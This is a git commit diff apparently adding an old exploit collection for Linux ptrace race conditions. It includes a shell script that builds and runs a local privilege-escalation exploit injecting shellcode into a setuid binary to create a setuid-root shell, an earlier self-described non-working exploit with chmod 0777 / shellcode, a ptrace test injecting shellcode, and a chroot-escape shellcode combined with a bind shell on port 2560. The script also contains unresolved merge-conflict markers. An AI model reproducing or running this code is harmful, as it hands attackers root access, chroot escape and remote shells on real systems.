initial

5 files changed, 680 insertions, 0 deletions

diff --git a/other/ptrace/3T-race b/other/ptrace/3T-race
new file mode 100644
index 0000000..4cc2931
--- /dev/null
+++ b/other/ptrace/3T-race
@@ -0,0 +1,217 @@
+#!/bin/sh
+
+#
+# IMPORTANT if you will get POKETEXT input/output error 
+# just run exploit again (I didn't debug why it crash sometimes:)
+#
+# I replaced /usr/bin/passwd with /bin/ping
+# It should be +s on meny boxes too and it has +r (passwd hasn't)
+# I nedd +r on binary to check address of .data segment.
+# 
+# I didn't make 'disk cache clean up' better.. sorry no time
+# I'll do it soon ;)
+# 
+# -tm
+
+
+echo -e "\E[1m\E[31m3T-race\E[m by \E[1mtmogg\E[m  < lam3rZ / HERT / TESO >"
+echo -en "\E[32m[+]\E[m Creating main code... "
+
+cat > /tmp/.3T-race.c <<_EOF1
+/*
+ *  3T-race by tmogg  < lam3rZ / HERT / TESO >
+ *  24/03/2001
+ */ 
+#include <sys/ptrace.h>
+#include <errno.h>
+#include <signal.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <asm/ptrace.h>
+#include <stdio.h>
+#include <sys/procfs.h>
+#include <strings.h>
+#define green "\E[32m"
+#define bold "\E[1m"
+#define normal "\E[m"
+#define red "\E[31m"
+
+char *the_suid = "/bin/ping" ;
+_EOF1
+
+addr=`/usr/bin/objdump -x /bin/ping 2>/dev/null | grep "\.data" | awk '{printf "0x"$4}'`
+echo "int some_add = $addr;" >> /tmp/.3T-race.c
+
+<<<<<<< 3T-race
+char *the_suid = "/usr/bin/passwd" ;
+//int some_add  = 0x0804bc6c ;              // objdump -x the_suid | grep .data
+int some_add = 0x0804e420;
+=======
+cat >> /tmp/.3T-race.c <<_EOF1
+>>>>>>> 1.2
+
+char *shellcode = 
+"\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb"
+"\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"
+"\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"
+"\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89"
+"\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b"
+"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
+"\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63"
+"\x30"
+"chown root:root /tmp/.xp;chmod 4755 /tmp/.xp";
+
+char *pl=green"[+]"normal;
+char *mi=red"[--]"normal;
+char *ch=bold"[*]"normal;
+char *la=green"[?]"normal;
+
+int stat(int a) {
+        char *dupa;
+        char fname[1024];
+
+        sprintf(fname,"/proc/%d/status",a);
+        a = open(fname,O_RDONLY);
+        read(a,fname,1024);
+        dupa = strchr(fname,'S');
+        if (dupa[7] == 'Z') { 
+                printf("\n%s Child died.\nExiting...\n",mi);
+                exit();
+        }
+        return dupa[7];
+}
+
+
+
+int main(int argc, char **argv)
+{
+        int pid;
+        int i,j;
+        void * p;
+        struct user_regs_struct regs;
+        char fname[1024];
+
+        if (argc == 1) {
+                printf("%s cleaning disk cache, please wait...",pl);
+                fflush(stdout);
+                system("cat /usr/bin/* >/dev/null 2>&1");
+                printf(" [done]\n%s starting main code\n", pl);
+                execl(argv[0],argv[0],"daj-mi-qrfa-roota",0);
+        }
+
+        pid = fork();
+        if (pid == 0) {
+                        printf("%s Child exec...\n",ch );
+                        i = open("/etc/lilo.conf",O_RDONLY);
+                        p = mmap(0,102400,PROT_READ,MAP_PRIVATE,i,0);
+                        i = execl(the_suid, p, 0);
+                        printf("%s Child exec error: %s\n", mi, strerror(errno));
+                        exit(-1);
+        } 
+        printf("%s Waiting for disk sleep.... ", pl);
+        printf("%s dunno why but that printf helps sometimes ;) %s\n",red,normal);
+        while (stat(pid)!='D') {}
+        printf("[OK]\n");
+        i = ptrace(PTRACE_ATTACH, pid, 0, 0);
+        if (i == -1)  {
+                printf("%s ATTACH: %s\nExiting...\n", mi, strerror(errno));
+                exit(-1);
+        }
+        printf("%s ATTACH: %d : %s\n", pl, i, strerror(errno));
+        waitpid(pid,0,0);
+//      printf("%sPress ENTER%s\n",red,normal);
+//      getchar();
+        j = ptrace(PTRACE_PEEKUSER, pid, (int)&regs.eip - (int)&regs.ebx, 0);
+        if (j == -1) {
+                printf("%s PEEKUSER: %s\n", mi, i, strerror(errno));
+                printf("Exiting...\n");
+                exit(-1);
+        }
+        printf("%s eip: 0x%x", pl, j);
+        j = some_add;
+        i = ptrace(PTRACE_POKEUSER, pid, (int)&regs.eip - (int)&regs.ebx, j);
+        if (i == -1) {
+                printf("\n%s POKEUSER: %s\nExiting...\n", mi, i, strerror(errno));
+                exit(-1);       
+        }
+        j = ptrace(PTRACE_PEEKUSER, pid, (int)&regs.eip - (int)&regs.ebx, 0);
+        if (j == -1) {
+                printf("\n%s PEEKUSER: %s\nExiting...\n", mi, strerror(errno));
+                exit(-1);
+        }
+        printf(" -> 0x%x\n", pl, j);
+        printf("%s copy data from 0x%x to 0x%x\n", pl, shellcode, some_add);
+        printf("%s[%s",green,normal);
+        for (j=0; j<=strlen(shellcode); j+=4) {
+                i = ptrace(PTRACE_POKETEXT, pid,some_add+j,*(int*)(shellcode+j));
+                if (i != 0) {
+                   printf("%s POKETEXT: %s\nExiting...\n", mi, strerror(errno));
+                   exit(-1);
+                }
+                printf(".");
+        } 
+        printf("%s]%s\n",green,normal);
+        //while (1) {}
+        i = ptrace(PTRACE_CONT, pid, 0, 0);
+        printf("%s CONT: %d : %s\n", la, i, strerror(errno));
+        printf("Status of %d: %c\n", pid, stat(pid));
+        i = ptrace(PTRACE_DETACH, pid, 0, SIGCONT);
+        printf("%s DETACH: %d : %s\n", la, i, strerror(errno));
+        printf("Status of %d: %c\n", pid, stat(pid));
+}
+
+_EOF1
+
+gcc -o /tmp/.3T-race /tmp/.3T-race.c > /dev/null 2>&1
+
+if [ ! -f /tmp/.3T-race ]; then
+  echo "[Failed]"
+  echo "Exiting..."
+  #rm -rf /tmp/.3T-race.c
+  exit
+fi
+
+echo "[done]"
+
+echo -en "\E[32m[+]\E[m Creating helper... "
+
+cat > /tmp/.xp.c <<_EOF2
+
+int main() {
+ int i;
+ 
+ i = setuid(0);
+ printf("setuid(0) = %d\n",i);
+ i = setgid(0);
+ printf("setgid(0) = %d\n",i);
+ system("/bin/sh");
+}
+
+_EOF2
+
+gcc -o /tmp/.xp /tmp/.xp.c > /dev/null 2>&1
+if [ ! -f /tmp/.xp ]; then
+ echo "[Failed]"
+ echo "Exiting..."
+ #rm -rf /tmp/.3T-race*
+ #rm -rf /tmp/.xp.c
+ exit
+fi
+echo "[done]"
+#rm -rf /tmp/.3T-race.c /tmp/.xp.c
+echo -e "\E[32m[+] Starting explit"
+/tmp/.3T-race
+sleep 2
+if [ -u /tmp/.xp ]; then
+        echo -e "\E[32m[+]\E[m Going to rootshell"
+        /tmp/.xp
+else
+        echo "Doesn't work ;("
+        killall -9 passwd
+fi
+echo -e "\E[32m[+]\E[m Cleaning up /tmp ..."
+#rm -rf /tmp/.3T-race /tmp/.xp
+echo "Thank you for using 3T-race."
diff --git a/other/ptrace/README b/other/ptrace/README
new file mode 100644
index 0000000..50853e6
--- /dev/null
+++ b/other/ptrace/README
@@ -0,0 +1,35 @@
+!!!!!!!!!!!!!!!!!!
+
+
+VERY important
+
+don't give infos for ppl out of TESO
+
+
+!!!!!!!!!!!!!!!!!!
+
+It's an example how to make race condition in linux kernel
+It was found by someone and was posted to BQ 
+There was no details about bug
+There was patches... erm... "patches" :)
+Doode which found this idea of exploiting told: "It works on 2.2.18-owl4" so...
+I didn't exploited that vuln. but i'm closer to do it day by day ;)
+
+If you have any ideas for this code give it for me plz
+
+How it works / should work:
+
+if you take a look at code you will se :)
+exec is called with mmaped file as argv[0]
+accessing this file will cause exec to lag
+
+but! we will got lag only when filename is not in disk cache 
+
+status of child should be 'D' (disk sleep) in attach time
+
+have fun with my code...
+
+and one more time: please... don't trade/ditribute it 
+
+tmogg@ags.pl | tmogg@hert.org 
+
diff --git a/other/ptrace/ptrace_exp.c b/other/ptrace/ptrace_exp.c
new file mode 100644
index 0000000..6acd1d8
--- /dev/null
+++ b/other/ptrace/ptrace_exp.c
@@ -0,0 +1,128 @@
+/* 
+ *  ptracing the suid for fun and proffit
+ *
+ *  21/03/2001 - tmoggie
+ *
+ *  exploit DOESN'T WORK yet.. so don't blame me for it :P
+ *  it's an example of the race!
+ *
+ *  gcc -Wall -o ptrace_expl ptrace_expl.c
+ *
+ */
+
+#include <sys/ptrace.h>
+#include <sys/procfs.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <errno.h>
+#include <signal.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <asm/ptrace.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+// chmod 0777 /
+char *shellcode = "\xb8\x0f\x00\x00\x00\x68\x2f\x00\x00\x2f\x89\xe3\xb9\xff\x01\x00\x00\xcd\x80";
+
+/* "\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb"
+"\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"
+"\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"
+"\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89"
+"\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b"
+"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
+"\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63"
+"\x30"
+"chmod 4777 /tmp/xp"; */
+
+long int some_add = 0x08048bc8 ;
+
+void
+stat(int pid) {
+        int i;
+        char fname[1024];
+
+        sprintf(fname,"/proc/%d/status",pid);
+        i = open(fname,O_RDONLY);
+        printf("open : %d\n",i);
+        read(i,fname,sizeof(fname));
+        close(i);
+        i=0;
+        while (fname[i] != '\n') i++;
+        i++;
+        while (fname[i]!='\n') i++;
+        fname[i]='\0';
+        printf("==================== status ============\n%s\n",fname);
+        printf("****************************************\n");
+}
+
+int main(int argc, char **argv)
+{
+        int pid;
+        int i,j;
+        int cnt;
+        void * p;
+        struct pt_regs regs;
+        /*struct elf_prpsinfo proc;*/
+
+        if (argc == 1) {
+                printf("[+] cleaning disk cache, pleas be patient...");
+                fflush(stdout);
+                system("cat /usr/bin/* >/dev/null 2>&1");
+                printf(" [done]\n[+] starting main code\n");
+                execl(argv[0],argv[0],"daj-mi-qrfa-roota",0);
+        }
+
+        pid = fork();
+        if (pid == 0) {
+                        i = open("/etc/lilo.conf",O_RDONLY);
+                        p = mmap(0,102400,PROT_READ,MAP_PRIVATE,i,0);
+                        printf("Child exec\n");
+                        execl("/usr/bin/passwd", p, 0);
+                        printf("C aiaiai: %s\n",strerror(errno));
+                        exit(-1);
+        } 
+        stat(pid); 
+        i = ptrace(PTRACE_ATTACH, pid, 0, 0);
+        printf("P ATT: %d : %s\n",i,strerror(errno));
+        if (i != 0)  {
+                printf("P ATT: failed: %s\n",strerror(errno));
+                exit(-1);
+        }
+        i = waitpid(pid,0,0);
+        i = ptrace(PTRACE_GETREGS,pid,&regs,0);
+        printf("PTRACE_GETREGS returned: %d : %s\n",i,strerror(errno));
+        stat(pid);
+/*      printf("eip = 0x%8.8lx\n",regs.eip);
+
+        printf("new eip = 0x0%8.8lx\n",some_add);
+        regs.eip = some_add;
+        i = ptrace(PTRACE_SETREGS,pid,&regs,5);
+        printf("[+] PTRACE_SETREGS returned: %d : %s\n",i,strerror(errno));
+*/
+        if ( (i = ptrace(PTRACE_POKEUSER, pid, 4*EIP, shellcode)) != 0)
+                fprintf(stderr, "err. ERROR ptrace_pikeuser\n");
+
+        stat(pid);
+        printf("[+] copy shellcode from P:0x%8.8x to C:0x%8.8lx\n[",
+                        (int)shellcode,some_add);
+        for (j=0;j<strlen(shellcode);j+=4) {
+                i = ptrace(PTRACE_POKETEXT,pid,some_add+j,*(int*)(shellcode+j));
+                printf(".");
+                if (i != 0) {
+                        printf("\n[-] PTRACE_POKETEXT returned: %d : %s\n",i,strerror(errno));
+                        printf("exiting\n");
+                        exit(-1);
+                }
+        }
+        printf("]\n");
+        stat(pid);
+        i = ptrace(PTRACE_DETACH, pid, 0, 0);
+        stat(pid);
+        exit(0);        /* gnu coding standarts :> */
+        return(0);
+}
diff --git a/other/ptrace/ptrace_test.c b/other/ptrace/ptrace_test.c
new file mode 100644
index 0000000..3d58f30
--- /dev/null
+++ b/other/ptrace/ptrace_test.c
@@ -0,0 +1,117 @@
+/*
+ * this is nothing. just to get familiar with ptrace stuff
+ * and testing...
+ */
+
+#include <sys/ptrace.h>
+#include <sys/procfs.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <errno.h>
+#include <signal.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <asm/ptrace.h>
+#include <stdio.h>
+
+/* lets take this lame shellcode...doing some useless jumps
+   nop's setuid(0) and exec /bin/id */
+char shellcode[] =  "\x90\x90\x90\x90\x90\x90\x90\x90"
+"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+        "\x80\xe8\xdc\xff\xff\xff/bin/id";
+
+
+void
+stat(int pid) {
+        int i;
+        char fname[1024];
+        sprintf(fname,"/proc/%d/status",pid);
+        i = open(fname,O_RDONLY);
+        printf("open : %d\n",i);
+        read(i,fname,sizeof(fname));
+        close(i);
+        i=0;
+        while (fname[i] != '\n') i++;
+        i++;
+        while (fname[i]!='\n') i++;
+        fname[i]='\0';
+        printf("==================== status ============\n%s\n",fname);
+        printf("****************************************\n");
+}
+
+void
+die(char *s, int code)
+{
+        fprintf(stderr, "ERROR: %s", s);
+        exit(code);
+}
+
+void
+test_shellcode(char *sc)
+{
+/* pushl sc; push ip; CALL xxx; pushl %ebp; movl %esp, %ebp */
+   __asm__("jmp             *0x8(%ebp)");
+}
+
+void
+mysignal(int sig)
+{
+        fprintf(stderr, "signal %d received\n", sig);
+}
+
+
+void
+do_child()
+{
+        int i=1;
+        /* no signal should be delivered...anyway. lets check
+           if someone is doing something evil to us...CATCH IT!*/
+        signal(SIGTRAP, mysignal);
+        signal(SIGALRM, mysignal);
+        signal(SIGCHLD, mysignal);
+        signal(SIGCONT, mysignal);
+        signal(SIGSTOP, mysignal);
+        while(i)        /* stay in here...parent, screw me up ! */
+        {
+                printf("child %d\n", i++);
+                sleep(2);
+        }
+
+}
+
+int
+main(int argc, char *argv[])
+{
+        int pid, i;
+        struct pt_regs regs;
+        struct elf_prpsinfo proc;
+
+
+        if ( (pid = fork()) == 0)
+                do_child();
+        if (pid < 0)
+                die("sucker..fork failed\n", -1);
+
+        stat(pid);
+        sleep(1);
+        printf("attaching child %d\n", pid);
+        if ( (i = ptrace(PTRACE_ATTACH, pid, 0, 0)) != 0)
+                die("ptrace_attach\n", -1);
+        i = waitpid(pid, 0,0);
+        stat(pid);
+        if ( (i = ptrace(PTRACE_POKEUSER, pid, 4*EIP, shellcode)) != 0)
+                die("ptrace_pokeuser\n", -1);
+        
+        if( (i = ptrace(PTRACE_DETACH, pid, 0, 0)) != 0)
+                die("ptrace_detach failed\n", -1);
+
+        stat(pid);
+        printf("done..w8ting 10 seconds\n");
+        sleep(10);
+
+        exit(0);
+        return(0);
+}
+
diff --git a/other/ptrace/ptracebreak.c b/other/ptrace/ptracebreak.c
new file mode 100644
index 0000000..d5e4f6b
--- /dev/null
+++ b/other/ptrace/ptracebreak.c
@@ -0,0 +1,183 @@
+/*
+        ptrace-chrootbreak shellcode, 95 bytes
+        
+        Since 2.4.14 kernel, linus stopped playing dir tricks
+        to leave chroot()-ed area. However, mknod() and ptrace()
+        can be still used to do so.
+
+        Algo:
+        1.      Try to regain uid/euid/gid/egid = 0, for case
+                that CAP_SYS_PTRACE is dropped. Also block
+                all signals, because some daemons would like
+                to die after SIGCHLD/SIGTRAP being received.
+        2.      Try attach to parent process in hope that
+                it is outside chroot(), if failed to do so,
+                we should be top process, so execute final shellcode.
+        3.      Get EIP of parent, and through PTRACE_POKETEXT
+                overwrite .text of parent with our own copy
+                at EIP location.
+        4.      Detach from parent and let it run our code from
+                step 1. Current process will exit().
+
+        By that way, we'll follow execution tree, so it should
+        work from any depth. Final shellcode will be executed
+        in case of error (i.e. ppid == 1) from the thread at the
+        top of process tree, which will be with some opportunity
+        outside chroot. Whoa.
+
+        However, this cannot be used against local execve,
+        because we're losing TTY. You need to use
+        some bind/connect dup()-ing shellcode.
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#define BINDPORT 2560
+
+/*
+asm("
+        .data
+        .p2align 0
+        .align  0
+ptrace_break:
+        jmp     jumpover
+getdelta:
+
+# setreuid(0, 0) & setregid(0, 0)  ... just to be sure :)
+        pushl   $70
+        popl    %eax
+        xorl    %ebx, %ebx
+        xorl    %ecx, %ecx
+        int     $0x80
+        mov     $71, %al
+        int     $0x80
+
+# ignore all signals, because some daemons
+# tends to do some odd stuff after SIGCHLD being received
+        mov     $69, %al
+        dec     %ebx
+        int     $0x80
+
+# getppid
+        pushl   $64
+        popl    %eax
+        int     $0x80
+        xchg    %eax, %ecx
+
+# try attach
+        mov     $26, %al
+        pushl   $0x10
+        popl    %ebx
+        int     $0x80
+
+        test    %eax, %eax
+        jnz     scode
+
+waitforthing:
+        pushal
+        movb    $7, %al
+        movl    %ecx, %ebx
+        xorl    %ecx, %ecx
+        pushl   $2
+        popl    %edx
+        int     $0x80
+        popal
+
+# get eip of parent
+getregs:
+        popl    %edi
+        pushl   %eax
+        movl    %esp, %esi
+        mov     $26, %al
+        mov     $3, %bl
+        pushl   $12*4
+        popl    %edx
+        int     $0x80
+        popl    %edx
+
+# well, now do some little harm; put us
+# at parent's eip :)
+        .byte   0x83, 0xef              # subl  $(scode-ptrace_break), %edi
+        .byte   (scode-ptrace_break)
+        movb    $4, %bl
+fuck_parent:
+        movb    $26, %al
+        movl    (%edi), %esi
+        int     $0x80
+        incl    %edi
+        incl    %edx
+        shl     $24, %esi
+        jnz     fuck_parent
+
+# detach and wake up parent
+# (data - %esi is always zero)
+detachthing:
+        mov     $26, %al
+        movb    $0x11, %bl
+        int     $0x80
+        inc     %eax
+        int     $0x80
+jumpover:
+        call    getdelta
+scode:
+        .byte   0
+");
+
+extern  void ptrace_break();
+extern  void ptrace_break_end();
+extern  unsigned char wport[2];
+*/
+
+/* our ptrace-break shellcode */
+unsigned char cbreak[] =
+        "\xeb\x58\x6a\x46\x58\x31\xdb\xcd\x80\xb0\x47\xcd\x80\xb0\x45\x4b"
+        "\xcd\x80\x6a\x40\x58\xcd\x80\x91\x6a\x1a\x58\x6a\x10\x5b\xcd\x80"
+        "\x85\xc0\x75\x3b\x60\xb0\x07\x89\xcb\x31\xc9\x6a\x02\x5a\xcd\x80"
+        "\x61\x5f\x50\x89\xe6\xb0\x1a\xb3\x03\x6a\x30\x5a\xcd\x80\x5a\x83"
+        "\xef\x5f\xb3\x04\xb0\x1a\x8b\x37\xcd\x80\x47\x42\xc1\xe6\x18\x75"
+        "\xf3\xb0\x1a\xb3\x11\xcd\x80\x40\xcd\x80\xe8\xa3\xff\xff\xff";
+
+/* classic bindshell */
+unsigned char bind[84] =
+        "\x6a\x66\x58\x31\xdb\x53\x43\x53"
+        "\x6a\x02\x89\xe1\xcd\x80\x43\x31"
+        "\xc9\x51\xb5\x0a\x0f\xc9\x09\xd9" /* 0x0a * 256 = port 2560 */
+        "\x51\x89\xe6\x6a\x10\x56\x50\x6a"
+        "\x66\x58\x89\xe1\xcd\x80\xb0\x66"
+        "\x43\x43\xcd\x80\x89\x64\x24\x08"
+        "\xb0\x66\x43\xcd\x80\x93\x91\x6a"
+        "\x3f\x58\xcd\x80\x49\x79\xf8\x50"
+        "\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
+        "\x62\x69\x89\xe3\x50\x53\x89\xe1"
+        "\xb0\x0b\xcd\x80";
+
+
+int     main()
+{
+        char    buf[512];
+        void            (*breakchroot)() = (void *) buf;
+
+        /* setup port to bind */
+        bind[19] = BINDPORT / 256;
+
+        /* build resulting code */
+        sprintf(buf, "%s%s", cbreak, bind);
+        
+        printf( "chroot break code length ... %d\n"
+                "portshell code length ...... %d\n"
+                "total shellcode length ..... %d\n",
+                strlen(cbreak), strlen(bind), strlen(buf));
+
+        printf( "\nNow, we'll execute shellcode\n"
+                "Note that your current tty/remote session will\n"
+                "be lost.\n"
+                "Portshell will be at port %d\n"
+                "Hit enter to continue, ^C to break\n", BINDPORT & ~0xff);
+
+        getchar();
+        breakchroot();
+
+        /* NOT REACHED */
+        return 0;
+}